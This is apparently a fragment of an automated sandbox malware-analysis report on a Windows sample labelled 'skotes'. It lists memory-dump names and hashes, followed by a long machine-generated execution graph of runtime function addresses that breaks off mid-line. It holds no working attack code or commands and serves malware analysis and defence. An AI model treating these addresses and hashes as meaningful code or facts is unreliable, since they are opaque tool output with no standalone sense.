                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                  • String ID: 8"M$`'M
                                                                                                                                                                                                                                                  • API String ID: 3903695350-1506308239
                                                                                                                                                                                                                                                  • Opcode ID: c63734afcc5cc91cdd024c38d852d3a01d2dae919c3f2a9102792de211e2db8b
                                                                                                                                                                                                                                                  • Instruction ID: b8dcbab755dbcc059bef28d85c36f09d39f7b03d99999b5d540f40501f1f4224
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c63734afcc5cc91cdd024c38d852d3a01d2dae919c3f2a9102792de211e2db8b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5318F31500201DFDB20AABAD945B5B73E6EF26316F10482FF485D7691DF78AC94CB19

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:6.9%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:740
                                                                                                                                                                                                                                                  Total number of Limit Nodes:89
                                                                                                                                                                                                                                                  execution_graph 36789 479ba5 36790 479bad _Ref_count_obj 36789->36790 36791 479c80 _Ref_count_obj 36790->36791 36792 47a91c 36790->36792 36800 4880c0 36791->36800 36797 47a953 36792->36797 36815 4a6c6a 36792->36815 36795 47a903 36796 47a9a7 36797->36796 36818 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36797->36818 36799 47a9b0 36801 4880de __InternalCxxFrameHandler 36800->36801 36804 488104 36800->36804 36801->36795 36802 4881ee 36827 489270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36802->36827 36804->36802 36806 488158 36804->36806 36807 48817d 36804->36807 36805 4881f3 36828 472480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ThreadProxy::ThreadProxy 36805->36828 36806->36805 36819 48d3e2 36806->36819 36811 48d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 36807->36811 36812 488169 std::_Rethrow_future_exception 36807->36812 36809 4881f8 36811->36812 36813 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36812->36813 36814 4881d0 _Ref_count_obj 36812->36814 36813->36802 36814->36795 36859 4a6bf6 RtlAllocateHeap __cftof __dosmaperr 36815->36859 36817 4a6c79 __cftof 36818->36799 36822 48d3e7 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 36819->36822 36821 48d401 36821->36812 36822->36821 36823 472480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ThreadProxy::ThreadProxy 36822->36823 36829 4a8be1 36822->36829 36824 48d40d Concurrency::details::_Condition_variable::wait_for Concurrency::details::ThreadProxy::ThreadProxy 36823->36824 36835 4a38af RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 36823->36835 36826 4724c3 36826->36812 36828->36809 36834 4ab04b Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr 36829->36834 36830 4ab089 36836 4a75f6 36830->36836 36832 4ab074 RtlAllocateHeap 36833 4ab087 36832->36833 36832->36834 36833->36822 36834->36830 36834->36832 36835->36826 36839 4aa7c8 36836->36839 36840 4aa7d2 __dosmaperr 36839->36840 36848 4a75fb 36840->36848 36850 4ad82f 36840->36850 36842 4aa813 __dosmaperr 36843 4aa853 36842->36843 36844 4aa81b __dosmaperr 36842->36844 36858 4aa49f RtlAllocateHeap __dosmaperr 36843->36858 36854 4aadf5 36844->36854 36847 4aa85e 36849 4aadf5 ___free_lconv_mon RtlAllocateHeap 36847->36849 36848->36833 36849->36848 36853 4ad83c Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr 36850->36853 36851 4ad867 RtlAllocateHeap 36852 4ad87a __dosmaperr 36851->36852 36851->36853 36852->36842 36853->36851 36853->36852 36855 4aae00 36854->36855 36857 4aae1b __dosmaperr 36854->36857 36856 4a75f6 __dosmaperr RtlAllocateHeap 36855->36856 36855->36857 36856->36857 36857->36848 36858->36847 36859->36817 36884 47a682 36885 47a68a _Ref_count_obj 36884->36885 36886 47a949 36885->36886 36887 47a75d _Ref_count_obj 36885->36887 36888 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36886->36888 36890 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36887->36890 36889 47a94e 36888->36889 36891 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36889->36891 36894 47a953 36889->36894 36892 47a903 36890->36892 36891->36894 36893 47a9a7 36894->36893 36897 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36894->36897 36896 47a9b0 36897->36896 36910 47a54d 36911 47a555 _Ref_count_obj 36910->36911 36912 47a628 _Ref_count_obj 36911->36912 36913 47a944 36911->36913 36916 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36912->36916 36914 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36913->36914 36915 47a949 36914->36915 36917 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36915->36917 36918 47a903 36916->36918 36919 47a94e 36917->36919 36920 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36919->36920 36922 47a953 36919->36922 36920->36922 36921 47a9a7 36922->36921 36925 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36922->36925 36924 47a9b0 36925->36924 36926 48d762 36936 48d76e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 36926->36936 36927 48d8ce ___scrt_fastfail 36962 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36927->36962 36929 48d8db 36963 4a65ed GetPEB GetPEB RtlAllocateHeap CallUnexpected 36929->36963 36931 48d8e3 ___security_init_cookie 36933 48d8e9 __scrt_common_main_seh 36931->36933 36932 48d7be 36934 48d83f 36945 4a95bc 36934->36945 36936->36927 36936->36932 36936->36934 36961 4a6603 3 API calls 4 library calls 36936->36961 36938 48d845 36949 486d30 36938->36949 36946 4a95ca 36945->36946 36947 4a95c5 36945->36947 36946->36938 36964 4a9320 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 36947->36964 36965 47a960 36949->36965 36953 486d45 36954 47d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 36953->36954 36955 486d4a 36954->36955 36956 484fc0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 36955->36956 36957 486d4f 36956->36957 36958 476020 RtlAllocateHeap RtlAllocateHeap 36957->36958 36959 486d54 36958->36959 36960 476020 RtlAllocateHeap RtlAllocateHeap 36959->36960 36960->36959 36961->36934 36962->36929 36963->36931 36964->36946 36967 47a968 36965->36967 36966 47a9a7 36970 47ce40 36966->36970 36967->36966 36975 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 36967->36975 36969 47a9b0 36976 487a00 36970->36976 36972 47ce92 36990 475c10 36972->36990 36974 47ce9d 36975->36969 36977 487a26 36976->36977 36978 487a2d 36977->36978 36979 487a81 36977->36979 36980 487a62 36977->36980 36978->36972 36985 48d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 36979->36985 36988 487a76 std::_Rethrow_future_exception 36979->36988 36981 487ab9 36980->36981 36982 487a69 36980->36982 37002 472480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ThreadProxy::ThreadProxy 36981->37002 36984 48d3e2 Concurrency::details::SchedulerProxy::CreateExternalThreadResource 2 API calls 36982->36984 36986 487a6f 36984->36986 36985->36988 36987 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36986->36987 36986->36988 36989 487ac3 __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection _Ref_count_obj 36987->36989 36988->36972 36989->36972 37003 475940 36990->37003 36994 475c6a 37027 474b30 36994->37027 36996 475c7b _Ref_count_obj 36998 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36996->36998 36999 475ce7 _Ref_count_obj 36996->36999 36997 475d17 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 36997->36974 36998->36999 36999->36997 37000 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36999->37000 37001 475d47 37000->37001 37002->36986 37034 487f80 2 API calls 4 library calls 37003->37034 37005 47596b 37006 4759e0 37005->37006 37035 487f80 2 API calls 4 library calls 37006->37035 37008 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37020 475a45 37008->37020 37009 475bdd __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 37009->36994 37010 475c09 37037 488200 RtlAllocateHeap RtlAllocateHeap 37010->37037 37012 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37012->37020 37020->37008 37020->37009 37020->37010 37020->37012 37036 475730 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37020->37036 37028 474dc2 37027->37028 37032 474b92 37027->37032 37028->36996 37030 474ce5 37030->37028 37040 488ca0 2 API calls 4 library calls 37030->37040 37032->37030 37038 4a6da6 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap __fassign 37032->37038 37039 488ca0 2 API calls 4 library calls 37032->37039 37034->37005 37035->37020 37036->37020 37038->37032 37039->37032 37040->37030 37041 4ac1c4 37042 4ac367 37041->37042 37044 4ac1ee 37041->37044 37043 4a75f6 __dosmaperr RtlAllocateHeap 37042->37043 37045 4ac352 __cftof __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 37043->37045 37044->37042 37046 4ac239 37044->37046 37056 4b292b 37046->37056 37048 4ac259 37060 4b2139 37048->37060 37050 4ac26d 37050->37045 37067 4b2165 37050->37067 37052 4ac27f 37052->37045 37074 4b2191 37052->37074 37054 4ac291 37054->37045 37081 4b2988 RtlAllocateHeap ___scrt_is_nonwritable_in_current_image CallUnexpected 37054->37081 37057 4b2937 ___scrt_is_nonwritable_in_current_image CallUnexpected 37056->37057 37058 4b295c 37057->37058 37082 4b284d 37057->37082 37058->37048 37061 4b215a 37060->37061 37062 4b2145 37060->37062 37061->37050 37063 4a75f6 __dosmaperr RtlAllocateHeap 37062->37063 37064 4b214a 37063->37064 37189 4a6c5a RtlAllocateHeap __cftof 37064->37189 37066 4b2155 37066->37050 37068 4b2171 37067->37068 37069 4b2186 37067->37069 37070 4a75f6 __dosmaperr RtlAllocateHeap 37068->37070 37069->37052 37071 4b2176 37070->37071 37190 4a6c5a RtlAllocateHeap __cftof 37071->37190 37073 4b2181 37073->37052 37075 4b219d 37074->37075 37076 4b21b2 37074->37076 37077 4a75f6 __dosmaperr RtlAllocateHeap 37075->37077 37076->37054 37078 4b21a2 37077->37078 37191 4a6c5a RtlAllocateHeap __cftof 37078->37191 37080 4b21ad 37080->37054 37081->37045 37083 4b2899 37082->37083 37095 4b28a0 37083->37095 37177 4ab04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr 37083->37177 37085 4b2910 37086 4b290d 37085->37086 37149 4b26f2 37085->37149 37091 4aadf5 ___free_lconv_mon RtlAllocateHeap 37086->37091 37088 4b2907 37098 4b2517 37088->37098 37089 4b28bf 37093 4aadf5 ___free_lconv_mon RtlAllocateHeap 37089->37093 37092 4b291b __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 37091->37092 37092->37058 37093->37095 37094 4b28b8 37094->37089 37096 4b28e5 37094->37096 37095->37085 37095->37088 37097 4aadf5 ___free_lconv_mon RtlAllocateHeap 37096->37097 37097->37095 37099 4b2526 37098->37099 37100 4b2191 RtlAllocateHeap 37099->37100 37101 4b253c 37100->37101 37102 4b2139 RtlAllocateHeap 37101->37102 37104 4b26c1 __cftof 37101->37104 37103 4b254e 37102->37103 37103->37104 37105 4aadf5 ___free_lconv_mon RtlAllocateHeap 37103->37105 37109 4b26c8 37103->37109 37106 4b2191 RtlAllocateHeap 37104->37106 37104->37109 37107 4b259e 37105->37107 37108 4b2717 37106->37108 37178 4ab04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr 37107->37178 37111 4b2139 RtlAllocateHeap 37108->37111 37118 4b2842 __cftof 37108->37118 37109->37086 37113 4b2729 37111->37113 37112 4b25b6 37114 4aadf5 ___free_lconv_mon RtlAllocateHeap 37112->37114 37115 4b2165 RtlAllocateHeap 37113->37115 37113->37118 37120 4b25c2 37114->37120 37116 4b273b 37115->37116 37117 4b2744 37116->37117 37116->37118 37119 4aadf5 ___free_lconv_mon RtlAllocateHeap 37117->37119 37136 4b28a0 37118->37136 37186 4ab04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr 37118->37186 37138 4b274f 37119->37138 37120->37109 37179 4aa1f1 RtlAllocateHeap __cftof __dosmaperr 37120->37179 37123 4b2910 37124 4b290d 37123->37124 37125 4b26f2 4 API calls 37123->37125 37130 4aadf5 ___free_lconv_mon RtlAllocateHeap 37124->37130 37125->37124 37126 4b25ec 37126->37104 37180 4b4a64 RtlAllocateHeap __cftof __dosmaperr 37126->37180 37127 4b2907 37129 4b2517 4 API calls 37127->37129 37128 4b28bf 37133 4aadf5 ___free_lconv_mon RtlAllocateHeap 37128->37133 37129->37124 37132 4b291b __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 37130->37132 37132->37086 37133->37136 37134 4b28b8 37134->37128 37137 4b28e5 37134->37137 37135 4b27be __cftof 37135->37086 37136->37123 37136->37127 37139 4aadf5 ___free_lconv_mon RtlAllocateHeap 37137->37139 37138->37135 37185 4aef17 GetPEB GetPEB RtlAllocateHeap __cftof _unexpected 37138->37185 37139->37136 37141 4b2605 37141->37104 37181 4a8bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 37141->37181 37143 4b262a 37144 4b2680 37143->37144 37182 4a8bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 37143->37182 37144->37109 37184 4b4a64 RtlAllocateHeap __cftof __dosmaperr 37144->37184 37146 4b2651 37146->37144 37183 4a8bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 37146->37183 37150 4b2701 37149->37150 37151 4b2191 RtlAllocateHeap 37150->37151 37152 4b2717 37151->37152 37153 4b2139 RtlAllocateHeap 37152->37153 37156 4b2842 __cftof 37152->37156 37154 4b2729 37153->37154 37155 4b2165 RtlAllocateHeap 37154->37155 37154->37156 37157 4b273b 37155->37157 37171 4b28a0 37156->37171 37188 4ab04b RtlAllocateHeap RtlAllocateHeap Concurrency::details::SchedulerProxy::CreateExternalThreadResource __dosmaperr 37156->37188 37157->37156 37158 4b2744 37157->37158 37159 4aadf5 ___free_lconv_mon RtlAllocateHeap 37158->37159 37173 4b274f 37159->37173 37161 4b2910 37162 4b290d 37161->37162 37163 4b26f2 4 API calls 37161->37163 37167 4aadf5 ___free_lconv_mon RtlAllocateHeap 37162->37167 37163->37162 37164 4b2907 37166 4b2517 4 API calls 37164->37166 37165 4b28bf 37169 4aadf5 ___free_lconv_mon RtlAllocateHeap 37165->37169 37166->37162 37168 4b291b __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 37167->37168 37168->37086 37169->37171 37170 4b28b8 37170->37165 37172 4b28e5 37170->37172 37171->37161 37171->37164 37174 4aadf5 ___free_lconv_mon RtlAllocateHeap 37172->37174 37176 4b27be __cftof 37173->37176 37187 4aef17 GetPEB GetPEB RtlAllocateHeap __cftof _unexpected 37173->37187 37174->37171 37176->37086 37177->37094 37178->37112 37179->37126 37180->37141 37181->37143 37182->37146 37183->37144 37184->37104 37185->37135 37186->37134 37187->37176 37188->37170 37189->37066 37190->37073 37191->37080 37192 4a6dda 37193 4a6de8 37192->37193 37194 4a6df6 37192->37194 37195 4a6e4c 4 API calls 37193->37195 37205 4a698d 37194->37205 37197 4a6df2 37195->37197 37198 4a6e10 37208 4a68ed 37198->37208 37201 4a6e24 37203 4a6e46 37201->37203 37204 4aadf5 ___free_lconv_mon RtlAllocateHeap 37201->37204 37204->37203 37232 4a690a 37205->37232 37207 4a699f __wsopen_s 37207->37198 37243 4a683b 37208->37243 37211 4a6e4c 37212 4a6e5a 37211->37212 37213 4a6e77 Concurrency::details::QuickBitSet::QuickBitSet 37211->37213 37275 4a75e3 RtlAllocateHeap __dosmaperr 37212->37275 37217 4a6eb9 37213->37217 37218 4a6e9d 37213->37218 37215 4a6e5f 37216 4a75f6 __dosmaperr RtlAllocateHeap 37215->37216 37219 4a6e67 37216->37219 37223 4a6eeb 37217->37223 37224 4a6edd 37217->37224 37277 4a75e3 RtlAllocateHeap __dosmaperr 37218->37277 37276 4a6c5a RtlAllocateHeap __cftof 37219->37276 37222 4a6ea2 37226 4a75f6 __dosmaperr RtlAllocateHeap 37222->37226 37279 4a6f2a GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __dosmaperr 37223->37279 37260 4a6fb4 37224->37260 37225 4a6e72 37225->37201 37229 4a6ea9 37226->37229 37278 4a6c5a RtlAllocateHeap __cftof 37229->37278 37231 4a6eb4 Concurrency::details::QuickBitSet::QuickBitSet 37231->37201 37233 4a692a 37232->37233 37234 4a6921 37232->37234 37233->37234 37240 4aa671 3 API calls 3 library calls 37233->37240 37234->37207 37236 4a694a 37241 4ab5fb GetPEB GetPEB RtlAllocateHeap __cftof 37236->37241 37238 4a6960 37242 4ab628 GetPEB GetPEB RtlAllocateHeap __cftof 37238->37242 37240->37236 37241->37238 37242->37234 37244 4a6849 37243->37244 37245 4a6863 37243->37245 37256 4a69cc RtlAllocateHeap ___free_lconv_mon 37244->37256 37247 4a686a 37245->37247 37249 4a6889 __fassign 37245->37249 37255 4a6853 37247->37255 37257 4a69e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 37247->37257 37252 4a689f __fassign 37249->37252 37259 4a69e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 37249->37259 37252->37255 37258 4a75c0 RtlAllocateHeap __dosmaperr 37252->37258 37253 4a68ab 37254 4a75f6 __dosmaperr RtlAllocateHeap 37253->37254 37254->37255 37255->37201 37255->37211 37256->37255 37257->37255 37258->37253 37259->37252 37261 4a6fdb 37260->37261 37262 4a6fef 37261->37262 37263 4a70a1 37261->37263 37268 4a7009 Concurrency::details::QuickBitSet::QuickBitSet 37262->37268 37290 4a732a RtlAllocateHeap __dosmaperr 37262->37290 37265 4a70be 37263->37265 37266 4a70af 37263->37266 37269 4a7098 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 37263->37269 37292 4a75c0 RtlAllocateHeap __dosmaperr 37265->37292 37267 4a75f6 __dosmaperr RtlAllocateHeap 37266->37267 37267->37269 37268->37265 37268->37269 37271 4a703e 37268->37271 37269->37231 37280 4a727c 37271->37280 37273 4a704a 37291 4a7249 RtlAllocateHeap __dosmaperr 37273->37291 37275->37215 37276->37225 37277->37222 37278->37231 37279->37231 37282 4a7292 _wcsrchr 37280->37282 37281 4a7309 37281->37273 37282->37281 37293 4abc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37282->37293 37284 4a72d6 37284->37281 37294 4abc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37284->37294 37286 4a72e7 37286->37281 37295 4abc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37286->37295 37288 4a72f8 37288->37281 37296 4abc13 GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37288->37296 37290->37268 37291->37269 37292->37269 37293->37284 37294->37286 37295->37288 37296->37281 37309 478b30 37310 478b7c 37309->37310 37311 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37310->37311 37312 478b8c 37311->37312 37313 475c10 5 API calls 37312->37313 37314 478b97 37313->37314 37315 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37314->37315 37316 478be3 37315->37316 37317 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37316->37317 37318 478c35 37317->37318 37324 488220 37318->37324 37320 478d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37321 478c47 _Ref_count_obj 37321->37320 37322 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37321->37322 37323 478d2d 37322->37323 37325 488248 37324->37325 37326 488292 37324->37326 37325->37326 37327 488251 37325->37327 37329 4882a1 __InternalCxxFrameHandler 37326->37329 37337 488f40 2 API calls 4 library calls 37326->37337 37332 489280 37327->37332 37329->37321 37331 48825a 37331->37321 37333 489294 37332->37333 37336 4892a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37333->37336 37338 4894e0 2 API calls 4 library calls 37333->37338 37335 48932b 37335->37331 37336->37331 37337->37329 37338->37335 37339 477430 37340 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37339->37340 37341 477465 37340->37341 37342 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37341->37342 37343 477478 37342->37343 37344 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37343->37344 37345 477488 37344->37345 37346 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37345->37346 37347 47749d 37346->37347 37348 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37347->37348 37349 4774b2 37348->37349 37350 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37349->37350 37351 4774c4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37350->37351 37352 477590 37355 4775ce 37352->37355 37353 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37354 47767a 37353->37354 37356 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37354->37356 37359 477654 37355->37359 37365 48d64e RtlAllocateHeap RtlAllocateHeap 37355->37365 37358 477693 37356->37358 37360 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37358->37360 37359->37353 37361 4776ac _Ref_count_obj 37360->37361 37362 47777f _Ref_count_obj 37361->37362 37363 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37361->37363 37364 4777a0 37363->37364 37365->37359 37366 486c70 37368 486ca0 37366->37368 37367 487a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37367->37368 37368->37367 37369 475c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 37368->37369 37371 4847b0 37368->37371 37369->37368 37372 4847eb 37371->37372 37376 484ee3 _Ref_count_obj 37371->37376 37373 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37372->37373 37372->37376 37375 48480c 37373->37375 37374 484f59 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37374->37368 37378 475c10 5 API calls 37375->37378 37376->37374 37377 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37376->37377 37379 484fba 37377->37379 37380 484813 37378->37380 37381 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37380->37381 37382 484825 37381->37382 37383 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37382->37383 37384 484837 37383->37384 37481 47be30 37384->37481 37386 484843 37387 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37386->37387 37388 484858 37387->37388 37389 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37388->37389 37390 484870 37389->37390 37391 475c10 5 API calls 37390->37391 37392 484877 37391->37392 37502 478580 37392->37502 37394 484883 37395 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37394->37395 37461 484afd 37394->37461 37397 48489f 37395->37397 37396 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37398 484b2f 37396->37398 37399 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37397->37399 37400 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37398->37400 37401 4848b7 37399->37401 37402 484b44 37400->37402 37403 475c10 5 API calls 37401->37403 37404 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37402->37404 37405 4848be 37403->37405 37406 484b56 37404->37406 37407 478580 2 API calls 37405->37407 37408 47be30 5 API calls 37406->37408 37409 4848ca 37407->37409 37410 484b62 37408->37410 37412 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37409->37412 37409->37461 37411 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37410->37411 37413 484b77 37411->37413 37414 4848e7 37412->37414 37415 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37413->37415 37417 475c10 5 API calls 37414->37417 37416 484b8f 37415->37416 37418 475c10 5 API calls 37416->37418 37421 4848ef 37417->37421 37419 484b96 37418->37419 37420 478580 2 API calls 37419->37420 37422 484ba2 37420->37422 37423 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37421->37423 37424 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37422->37424 37426 484e70 _Ref_count_obj 37422->37426 37432 484959 _Ref_count_obj 37423->37432 37425 484bbe 37424->37425 37427 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37425->37427 37426->37376 37429 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37426->37429 37428 484bd6 37427->37428 37431 475c10 5 API calls 37428->37431 37429->37376 37430 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37433 4849e6 37430->37433 37434 484bdd 37431->37434 37432->37430 37435 475c10 5 API calls 37433->37435 37436 478580 2 API calls 37434->37436 37440 4849ee 37435->37440 37437 484be9 37436->37437 37437->37426 37438 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37437->37438 37439 484c06 37438->37439 37441 475c10 5 API calls 37439->37441 37442 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37440->37442 37443 484c0e 37441->37443 37444 484a49 _Ref_count_obj 37442->37444 37445 484c5a 37443->37445 37446 484f97 37443->37446 37444->37461 37529 4798f0 37444->37529 37449 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37445->37449 37541 488200 RtlAllocateHeap RtlAllocateHeap 37446->37541 37458 484c78 _Ref_count_obj 37449->37458 37450 484ad5 37453 4a75f6 __dosmaperr RtlAllocateHeap 37450->37453 37450->37461 37451 484f9c 37542 48c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ThreadProxy::ThreadProxy 37451->37542 37456 484ade 37453->37456 37454 484cec _Ref_count_obj 37459 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37454->37459 37455 484fa6 37460 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37455->37460 37537 4a8ab6 37456->37537 37458->37454 37458->37455 37462 484d05 37459->37462 37463 484fab 37460->37463 37461->37396 37461->37451 37464 475c10 5 API calls 37462->37464 37465 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37463->37465 37466 484d0d 37464->37466 37465->37426 37467 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37466->37467 37469 484d68 _Ref_count_obj 37467->37469 37468 484ddc _Ref_count_obj 37470 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 